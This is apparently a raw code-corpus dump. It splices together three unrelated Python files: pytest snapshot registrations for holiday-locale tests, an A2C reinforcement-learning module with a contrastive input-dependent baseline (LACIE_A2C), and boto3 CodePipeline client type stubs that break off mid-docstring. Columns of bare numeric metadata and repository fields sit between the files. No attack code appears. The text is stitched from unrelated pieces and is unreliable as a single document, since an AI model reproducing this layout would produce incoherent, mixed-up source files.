snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2018] 1.py')
# Register a file-backed snapshot for every (locale, year) parametrization of
# test_holidata_produces_holidays_for_locale_and_year.  The dict key and the
# snapshot file name share the same stem, so both are derived from one string.
# fi_FI contributes only 2019-2021 here; every other locale covers 2011-2021.
_snapshot_cases = [('fi_FI', (2019, 2020, 2021))]
_snapshot_cases += [
    (_locale, tuple(range(2011, 2022)))
    for _locale in ('fr_BE', 'fr_CA', 'fr_FR', 'hr_HR', 'is_IS', 'it_IT',
                    'nb_NO', 'nl_BE', 'nl_NL', 'pl_PL', 'pt_PT', 'ru_RU',
                    'sk_SK', 'sv_FI', 'sv_SE')
]
for _locale, _years in _snapshot_cases:
    for _year in _years:
        _stem = 'test_holidata_produces_holidays_for_locale_and_year[{0}-{1}] 1'.format(_locale, _year)
        snapshots[_stem] = FileSnapshot('snap_test_holidata/{0}.py'.format(_stem))
| 92.061286
| 184
| 0.875984
| 9,925
| 61,589
| 4.836877
| 0.007154
| 0.247469
| 0.274966
| 0.384952
| 0.996709
| 0.996709
| 0.996709
| 0.996709
| 0.996709
| 0.996709
| 0
| 0.055436
| 0.032587
| 61,589
| 668
| 185
| 92.199102
| 0.750277
| 0.001007
| 0
| 0
| 0
| 0
| 0.815292
| 0.777745
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008982
| 0
| 0.008982
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
079cbc31e02ef8bb51e610cba7126606619a38d5
| 11,116
|
py
|
Python
|
core/algorithms/lacie/lacie_a2c.py
|
lehduong/Input-Dependent-Baseline
|
cb140338eb35a568fe1d320d0b8e52b739470b59
|
[
"Apache-2.0"
] | 4
|
2020-12-05T18:51:03.000Z
|
2022-01-03T16:04:35.000Z
|
core/algorithms/lacie/lacie_a2c.py
|
lehduong/Job-Scheduling-with-Reinforcement-Learning
|
cb140338eb35a568fe1d320d0b8e52b739470b59
|
[
"Apache-2.0"
] | null | null | null |
core/algorithms/lacie/lacie_a2c.py
|
lehduong/Job-Scheduling-with-Reinforcement-Learning
|
cb140338eb35a568fe1d320d0b8e52b739470b59
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from itertools import chain
from torch import optim
from core.algorithms.lacie.base_lacie import LacieAlgo
from core.storage import LacieStorage
class LACIE_A2C(LacieAlgo):
    """
    Meta Input-dependent Baseline A2C.

    This A2C variant leverages an input-dependent baseline, learned with
    meta learning (a contrastive predictive model provided by ``LacieAlgo``),
    to reduce variance when updating the policy parameters.
    """

    def __init__(self,
                 actor_critic,
                 value_coef,
                 entropy_coef,
                 regularize_coef,
                 eps=None,
                 alpha=None,
                 state_to_input_seq=None,
                 lr=1e-3,
                 max_grad_norm=None,
                 expert=None,
                 il_coef=1,
                 num_cpc_steps=10,
                 cpc_lr=1e-3):
        """
        :param actor_critic: policy/value network; its ``evaluate_actions``
            scores rollout actions and its parameters are optimized here.
        :param value_coef: weight of the critic (value) loss in the total loss.
        :param entropy_coef: weight of the entropy bonus (subtracted from loss).
        :param regularize_coef: weight of the CPC regularization term.
        :param eps: NOTE(review): accepted but neither stored nor forwarded to
            the base class — looks obsolete; confirm before removing.
        :param alpha: NOTE(review): same situation as ``eps`` — unused here.
        :param state_to_input_seq: forwarded to ``LacieAlgo``; presumably maps
            states to the input sequences the baseline conditions on — TODO
            confirm against the base class.
        :param lr: learning rate for the main (actor-critic) optimizer.
        :param max_grad_norm: gradient clipping threshold for the
            actor-critic parameters.
        :param expert: optional expert policy; when truthy, enables the
            imitation-learning term in ``update``.
        :param il_coef: weight of the imitation-learning loss.
        :param num_cpc_steps: number of contrastive-model training steps
            performed per ``update`` call.
        :param cpc_lr: learning rate of the CPC optimizer.
        """
        super().__init__(actor_critic=actor_critic,
                         lr=lr,
                         value_coef=value_coef,
                         entropy_coef=entropy_coef,
                         regularize_coef=regularize_coef,
                         state_to_input_seq=state_to_input_seq,
                         expert=expert,
                         il_coef=il_coef,
                         num_cpc_steps=num_cpc_steps,
                         cpc_lr=cpc_lr)
        self.max_grad_norm = max_grad_norm

    def update(self, rollouts):
        """
        Perform one LACIE-A2C update from a rollout batch.

        Steps: (1) evaluate the rollout actions to get values / log-probs /
        entropy, (2) compute the critic loss from unweighted advantages,
        (3) train the contrastive predictive model for ``num_cpc_steps``,
        (4) compute input-dependent weighted advantages for the actor loss,
        (5) optionally add an imitation loss, then back-propagate the
        combined objective with gradient clipping.

        :param rollouts: rollout storage exposing ``obs``, ``actions``,
            ``masks``, ``rewards``, ``returns`` and
            ``recurrent_hidden_states`` tensors.
        :returns: dict of scalar diagnostics (losses and accuracies).
        """
        obs_shape = rollouts.obs.size()[2:]
        action_shape = rollouts.actions.size()[-1]
        num_steps, num_processes, _ = rollouts.rewards.size()
        # Estimate baseline: flatten (step, process) dims before evaluation.
        values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
            rollouts.obs[:-1].view(-1, *obs_shape),
            rollouts.recurrent_hidden_states[:-1].view(
                -1, self.actor_critic.recurrent_hidden_state_size),
            rollouts.masks[:-1].view(-1, 1),
            rollouts.actions.view(-1, action_shape))
        values = values.view(num_steps, num_processes, 1)
        action_log_probs = action_log_probs.view(num_steps, num_processes, 1)
        advantages = rollouts.returns[:-1] - values
        returns = rollouts.returns[:-1]
        # Value loss for updating Critic Net (MSE between returns and values).
        value_loss = advantages.pow(2).mean()
        # LEARNING CONTRASTIVE PREDICTIVE MODEL
        # Compute contrastive loss and accuracy once, before training the CPC
        # model, purely for logging (converted to floats immediately below).
        contrastive_loss, contrastive_accuracy, regularize_loss = self.compute_contrastive_loss(
            rollouts.obs, rollouts.actions, rollouts.masks, returns)
        contrastive_loss = contrastive_loss.item()
        regularize_loss = regularize_loss.item()
        # computed weighted advantage according to its dependency with input sequences
        # learn cpc model for n steps
        for _ in range(self.num_cpc_steps):
            cpc_loss, _, cpc_regularize_loss = self.compute_contrastive_loss(
                rollouts.obs, rollouts.actions, rollouts.masks, returns)
            self.cpc_optimizer.zero_grad()
            (cpc_loss + self.regularize_coef * cpc_regularize_loss).backward()
            # nn.utils.clip_grad_norm_(chain(self.advantage_encoder.parameters(),
            #                                self.input_seq_encoder.parameters(),
            #                                self.state_encoder.parameters(),
            #                                self.condition_encoder.parameters(),
            #                                self.action_encoder.parameters()),
            #                          self.max_grad_norm)
            self.cpc_optimizer.step()
        # IMPORTANCE: we need to compute the weighted before learn cpc model
        # FIXME: Move to training to top to verify if the model can estimate density ratio
        # NOTE(review): the comment above says "before", but the weighting is
        # computed AFTER the CPC training loop — confirm intended ordering.
        weighted_advantages = self.compute_weighted_advantages(
            rollouts.obs, rollouts.actions, rollouts.masks, returns) - values
        # Action loss of Actor Net; advantages are detached so the actor
        # gradient does not flow into the critic/CPC networks.
        action_loss = -(weighted_advantages.detach() * action_log_probs).mean()
        # IMITATION LEARNING (only active when an expert policy was supplied).
        imitation_loss, imitation_accuracy = torch.tensor(
            0).to(rollouts.obs.device), 0
        if self.expert:
            imitation_loss, imitation_accuracy = self.imitation_learning(
                rollouts.obs[:-1].view(-1, *obs_shape),
                rollouts.recurrent_hidden_states[0].view(
                    -1, self.actor_critic.recurrent_hidden_state_size),
                rollouts.masks[:-1].view(-1, 1),
                self.expert)
        self.optimizer.zero_grad()
        # Combined objective: imitation + critic + actor - entropy bonus.
        (imitation_loss * self.il_coef + value_loss * self.value_coef + action_loss -
         dist_entropy * self.entropy_coef).backward()
        nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
                                 self.max_grad_norm)
        self.optimizer.step()
        self.after_update()
        return {
            'value loss': value_loss.item(),
            'action loss': action_loss.item(),
            'entropy loss': dist_entropy.item(),
            'imitation loss': imitation_loss.item(),
            'imitation accuracy': imitation_accuracy,
            'contrastive loss': contrastive_loss,
            'contrastive accuracy': contrastive_accuracy,
            'regularize loss': regularize_loss
        }
class LACIE_A2C_Memory(LACIE_A2C):
    """
    LACIE-A2C with an external replay buffer for the contrastive model.

    Unlike ``LACIE_A2C``, the contrastive predictive model is trained on
    batches sampled from ``lacie_buffer`` (which accumulates past rollouts
    and their advantages) instead of only the current rollout, and the CPC
    target is the detached advantage rather than the raw return.
    """

    def __init__(self,
                 actor_critic,
                 value_coef,
                 entropy_coef,
                 regularize_coef,
                 eps=None,
                 alpha=None,
                 state_to_input_seq=None,
                 lr=1e-3,
                 max_grad_norm=None,
                 expert=None,
                 il_coef=1,
                 num_cpc_steps=10,
                 lacie_batch_size=64,
                 lacie_buffer=None,
                 use_memory_to_pred_weights=False,
                 cpc_lr=1e-3):
        """
        Additional parameters over ``LACIE_A2C``:

        :param lacie_batch_size: batch size used when sampling from the
            LACIE buffer.  NOTE(review): stored but not referenced in this
            class — presumably consumed by the buffer itself; confirm.
        :param lacie_buffer: storage object providing ``insert``, ``sample``
            and ``sample_most_recent`` (see ``LacieStorage``).
        :param use_memory_to_pred_weights: when True, the weighted advantages
            are predicted from the most recent buffer sample instead of the
            current rollout.
        """
        super().__init__(actor_critic,
                         value_coef,
                         entropy_coef,
                         regularize_coef,
                         eps,
                         alpha,
                         state_to_input_seq,
                         lr,
                         max_grad_norm,
                         expert,
                         il_coef,
                         num_cpc_steps,
                         cpc_lr)
        self.lacie_batch_size = lacie_batch_size
        self.lacie_buffer = lacie_buffer
        self.use_memory_to_pred_weights = use_memory_to_pred_weights

    def update(self, rollouts):
        """
        Perform one LACIE-A2C update, training the contrastive model from
        the replay buffer.

        Same overall flow as ``LACIE_A2C.update`` except: the current rollout
        (with detached advantages) is first inserted into ``lacie_buffer``;
        the CPC training loop draws samples from that buffer; and the
        advantage weighting may come from the buffer's most recent sample
        when ``use_memory_to_pred_weights`` is set.

        :param rollouts: rollout storage (see ``LACIE_A2C.update``).
        :returns: dict of scalar diagnostics (losses and accuracies).
        """
        obs_shape = rollouts.obs.size()[2:]
        action_shape = rollouts.actions.size()[-1]
        num_steps, num_processes, _ = rollouts.rewards.size()
        # Estimate baseline: flatten (step, process) dims before evaluation.
        values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
            rollouts.obs[:-1].view(-1, *obs_shape),
            rollouts.recurrent_hidden_states[:-1].view(
                -1, self.actor_critic.recurrent_hidden_state_size),
            rollouts.masks[:-1].view(-1, 1),
            rollouts.actions.view(-1, action_shape))
        values = values.view(num_steps, num_processes, 1)
        action_log_probs = action_log_probs.view(num_steps, num_processes, 1)
        advantages = rollouts.returns[:-1] - values
        returns = rollouts.returns[:-1]
        # Value loss for updating Critic Net (MSE between returns and values).
        value_loss = advantages.pow(2).mean()
        # LEARNING CONTRASTIVE PREDICTIVE MODEL
        # update LACIE_Storage with the current rollout and detached advantages
        self.lacie_buffer.insert(rollouts, advantages.detach())
        # Compute contrastive loss and accuracy once for logging.  Note: the
        # CPC target here is the detached advantage, not the return as in the
        # parent class.
        contrastive_loss, contrastive_accuracy, regularize_loss = self.compute_contrastive_loss(
            rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
        contrastive_loss = contrastive_loss.item()
        regularize_loss = regularize_loss.item()
        # computed weighted advantage according to its dependency with input sequences
        # learn cpc model for n steps, each step on a fresh buffer sample
        for _ in range(self.num_cpc_steps):
            data = self.lacie_buffer.sample()
            obs, actions, masks, sample_advantages = data['obs'], data['actions'], data['masks'], data['advantages']
            cpc_loss, _, cpc_regularize_loss = self.compute_contrastive_loss(
                obs, actions, masks, sample_advantages)
            self.cpc_optimizer.zero_grad()
            (cpc_loss + self.regularize_coef * cpc_regularize_loss).backward()
            # nn.utils.clip_grad_norm_(chain(self.advantage_encoder.parameters(),
            #                                self.input_seq_encoder.parameters(),
            #                                self.state_encoder.parameters(),
            #                                self.condition_encoder.parameters(),
            #                                self.action_encoder.parameters()),
            #                          self.max_grad_norm)
            self.cpc_optimizer.step()
        # IMPORTANCE: we need to compute the weighted before learn cpc model
        # FIXME: Move the cpc training on top to verify if it can learn useful estimation
        # NOTE(review): as in the parent class, the weighting is actually
        # computed AFTER the CPC loop — confirm intended ordering.
        if not self.use_memory_to_pred_weights:
            weighted_advantages = self.compute_weighted_advantages(
                rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
        else:
            data = self.lacie_buffer.sample_most_recent()
            obs, actions, masks, sample_advantages = data['obs'], data[
                'actions'], data['masks'], data['advantages']
            # The extra argument is the current number of parallel processes,
            # taken from the rollout's action tensor.
            weighted_advantages = self.compute_weighted_advantages(
                obs, actions, masks, sample_advantages, rollouts.actions.shape[1])
        # Action loss of Actor Net; detached so the actor gradient does not
        # flow into the critic/CPC networks.
        action_loss = -(weighted_advantages.detach() * action_log_probs).mean()
        # IMITATION LEARNING (only active when an expert policy was supplied).
        imitation_loss, imitation_accuracy = torch.tensor(
            0).to(rollouts.obs.device), 0
        if self.expert:
            imitation_loss, imitation_accuracy = self.imitation_learning(
                rollouts.obs[:-1].view(-1, *obs_shape),
                rollouts.recurrent_hidden_states[0].view(
                    -1, self.actor_critic.recurrent_hidden_state_size),
                rollouts.masks[:-1].view(-1, 1),
                self.expert)
        self.optimizer.zero_grad()
        # Combined objective: imitation + critic + actor - entropy bonus.
        (imitation_loss * self.il_coef + value_loss * self.value_coef + action_loss -
         dist_entropy * self.entropy_coef).backward()
        nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
                                 self.max_grad_norm)
        self.optimizer.step()
        self.after_update()
        return {
            'value loss': value_loss.item(),
            'action loss': action_loss.item(),
            'entropy loss': dist_entropy.item(),
            'imitation loss': imitation_loss.item(),
            'imitation accuracy': imitation_accuracy,
            'contrastive loss': contrastive_loss,
            'contrastive accuracy': contrastive_accuracy,
            'regularize loss': regularize_loss
        }
| 42.26616
| 116
| 0.578715
| 1,166
| 11,116
| 5.228988
| 0.134648
| 0.039364
| 0.024602
| 0.019682
| 0.86436
| 0.824996
| 0.808758
| 0.80761
| 0.794981
| 0.777268
| 0
| 0.009485
| 0.336092
| 11,116
| 262
| 117
| 42.427481
| 0.816667
| 0.163458
| 0
| 0.73913
| 0
| 0
| 0.03051
| 0
| 0
| 0
| 0
| 0.003817
| 0
| 1
| 0.021739
| false
| 0
| 0.032609
| 0
| 0.076087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6af88666f89d9491a21163c4ad8f94d6f5132101
| 199,266
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/codepipeline/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/codepipeline/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/codepipeline/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def acknowledge_job(self, jobId: str, nonce: str) -> Dict:
"""
Returns information about a specified job and whether that job has been received by the job worker. Only used for custom actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/AcknowledgeJob>`_
**Request Syntax**
::
response = client.acknowledge_job(
jobId='string',
nonce='string'
)
**Response Syntax**
::
{
'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
}
**Response Structure**
- *(dict) --*
Represents the output of an AcknowledgeJob action.
- **status** *(string) --*
Whether the job worker has received the specified job.
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID of the job for which you want to confirm receipt.
:type nonce: string
:param nonce: **[REQUIRED]**
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Get this number from the response of the PollForJobs request that returned this job.
:rtype: dict
:returns:
"""
pass
def acknowledge_third_party_job(self, jobId: str, nonce: str, clientToken: str) -> Dict:
"""
Confirms a job worker has received the specified job. Only used for partner actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/AcknowledgeThirdPartyJob>`_
**Request Syntax**
::
response = client.acknowledge_third_party_job(
jobId='string',
nonce='string',
clientToken='string'
)
**Response Syntax**
::
{
'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
}
**Response Structure**
- *(dict) --*
Represents the output of an AcknowledgeThirdPartyJob action.
- **status** *(string) --*
The status information for the third party job, if any.
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID of the job.
:type nonce: string
:param nonce: **[REQUIRED]**
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Get this number from the response to a GetThirdPartyJobDetails request.
:type clientToken: string
:param clientToken: **[REQUIRED]**
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:rtype: dict
:returns:
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_custom_action_type(self, category: str, provider: str, version: str, inputArtifactDetails: Dict, outputArtifactDetails: Dict, settings: Dict = None, configurationProperties: List = None) -> Dict:
"""
Creates a new custom action that can be used in all pipelines associated with the AWS account. Only used for custom actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/CreateCustomActionType>`_
**Request Syntax**
::
response = client.create_custom_action_type(
category='Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
provider='string',
version='string',
settings={
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
configurationProperties=[
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
inputArtifactDetails={
'minimumCount': 123,
'maximumCount': 123
},
outputArtifactDetails={
'minimumCount': 123,
'maximumCount': 123
}
)
**Response Syntax**
::
{
'actionType': {
'id': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'settings': {
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
'actionConfigurationProperties': [
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
'inputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
},
'outputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
}
}
}
**Response Structure**
- *(dict) --*
Represents the output of a CreateCustomActionType operation.
- **actionType** *(dict) --*
Returns information about the details of an action type.
- **id** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **settings** *(dict) --*
The settings for the action type.
- **thirdPartyConfigurationUrl** *(string) --*
The URL of a sign-up page where users can sign up for an external service and perform initial configuration of the action provided by that service.
- **entityUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that provides a deep link to the resources of the external system, such as the configuration page for an AWS CodeDeploy deployment group. This link is provided as part of the action display within the pipeline.
- **executionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the top-level landing page for the external system, such as console page for AWS CodeDeploy. This link is shown on the pipeline view page in the AWS CodePipeline console and provides a link to the execution entity of the external action.
- **revisionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the page where customers can update or change the configuration of the external action.
- **actionConfigurationProperties** *(list) --*
The configuration properties for the action type.
- *(dict) --*
Represents information about an action configuration property.
- **name** *(string) --*
The name of the action configuration property.
- **required** *(boolean) --*
Whether the configuration property is a required value.
- **key** *(boolean) --*
Whether the configuration property is a key.
- **secret** *(boolean) --*
Whether the configuration property is secret. Secrets are hidden from all calls except for GetJobDetails, GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs.
When updating a pipeline, passing * * * * * without changing any other values of the action will preserve the prior value of the secret.
- **queryable** *(boolean) --*
Indicates that the property will be used in conjunction with PollForJobs. When creating a custom action, an action can have up to one queryable property. If it has one, that property must be both required and not secret.
If you create a pipeline with a custom action type, and that custom action contains a queryable property, the value for that configuration property is subject to additional restrictions. The value must be less than or equal to twenty (20) characters. The value can contain only alphanumeric characters, underscores, and hyphens.
- **description** *(string) --*
The description of the action configuration property that will be displayed to users.
- **type** *(string) --*
The type of the configuration property.
- **inputArtifactDetails** *(dict) --*
The details of the input artifact for the action, such as its commit ID.
- **minimumCount** *(integer) --*
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --*
The maximum number of artifacts allowed for the action type.
- **outputArtifactDetails** *(dict) --*
The details of the output artifact of the action, such as its commit ID.
- **minimumCount** *(integer) --*
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --*
The maximum number of artifacts allowed for the action type.
:type category: string
:param category: **[REQUIRED]**
The category of the custom action, such as a build action or a test action.
.. note::
Although Source and Approval are listed as valid values, they are not currently functional. These values are reserved for future use.
:type provider: string
:param provider: **[REQUIRED]**
The provider of the service used in the custom action, such as AWS CodeDeploy.
:type version: string
:param version: **[REQUIRED]**
The version identifier of the custom action.
:type settings: dict
:param settings:
Returns information about the settings for an action type.
- **thirdPartyConfigurationUrl** *(string) --*
The URL of a sign-up page where users can sign up for an external service and perform initial configuration of the action provided by that service.
- **entityUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that provides a deep link to the resources of the external system, such as the configuration page for an AWS CodeDeploy deployment group. This link is provided as part of the action display within the pipeline.
- **executionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the top-level landing page for the external system, such as console page for AWS CodeDeploy. This link is shown on the pipeline view page in the AWS CodePipeline console and provides a link to the execution entity of the external action.
- **revisionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the page where customers can update or change the configuration of the external action.
:type configurationProperties: list
:param configurationProperties:
The configuration properties for the custom action.
.. note::
You can refer to a name in the configuration properties of the custom action within the URL templates by following the format of {Config:name}, as long as the configuration property is both required and not secret. For more information, see `Create a Custom Action for a Pipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/how-to-create-custom-action.html>`__ .
- *(dict) --*
Represents information about an action configuration property.
- **name** *(string) --* **[REQUIRED]**
The name of the action configuration property.
- **required** *(boolean) --* **[REQUIRED]**
Whether the configuration property is a required value.
- **key** *(boolean) --* **[REQUIRED]**
Whether the configuration property is a key.
- **secret** *(boolean) --* **[REQUIRED]**
Whether the configuration property is secret. Secrets are hidden from all calls except for GetJobDetails, GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs.
When updating a pipeline, passing * * * * * without changing any other values of the action will preserve the prior value of the secret.
- **queryable** *(boolean) --*
Indicates that the property will be used in conjunction with PollForJobs. When creating a custom action, an action can have up to one queryable property. If it has one, that property must be both required and not secret.
If you create a pipeline with a custom action type, and that custom action contains a queryable property, the value for that configuration property is subject to additional restrictions. The value must be less than or equal to twenty (20) characters. The value can contain only alphanumeric characters, underscores, and hyphens.
- **description** *(string) --*
The description of the action configuration property that will be displayed to users.
- **type** *(string) --*
The type of the configuration property.
:type inputArtifactDetails: dict
:param inputArtifactDetails: **[REQUIRED]**
The details of the input artifact for the action, such as its commit ID.
- **minimumCount** *(integer) --* **[REQUIRED]**
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --* **[REQUIRED]**
The maximum number of artifacts allowed for the action type.
:type outputArtifactDetails: dict
:param outputArtifactDetails: **[REQUIRED]**
The details of the output artifact of the action, such as its commit ID.
- **minimumCount** *(integer) --* **[REQUIRED]**
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --* **[REQUIRED]**
The maximum number of artifacts allowed for the action type.
:rtype: dict
:returns:
"""
pass
def create_pipeline(self, pipeline: Dict) -> Dict:
"""
Creates a pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/CreatePipeline>`_
**Request Syntax**
::
response = client.create_pipeline(
pipeline={
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
}
)
**Response Syntax**
::
{
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
}
}
**Response Structure**
- *(dict) --*
Represents the output of a CreatePipeline action.
- **pipeline** *(dict) --*
Represents the structure of actions and stages to be performed in the pipeline.
- **name** *(string) --*
The name of the action to be performed.
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
